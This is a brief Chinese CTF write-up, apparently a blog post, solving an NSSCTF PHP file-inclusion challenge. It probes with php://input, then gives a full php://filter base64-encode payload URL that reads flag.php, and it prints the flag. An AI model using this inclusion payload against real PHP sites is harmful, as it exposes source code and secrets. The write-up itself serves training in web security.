NSSCTF_Web_include

文件包含类:

挨个挨个试

1.?file=php://input

访问原始数据的只读流,得知flag在flag.php里:

 

 

2.已知flag所在文件位置,直接使用php://filter获取指定文件源码,构造payload:

http://1.14.71.254:28054/?file=php://filter/read=convert.base64-encode/resource=flag.php

得到一串base64加密字符,解码得到flag:

NSSCTF{5a3b5dd3-f57a-4c16-a089-ada9a8047fd5}

posted @   Luccky  阅读(64)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
点击右上角即可分享
微信分享提示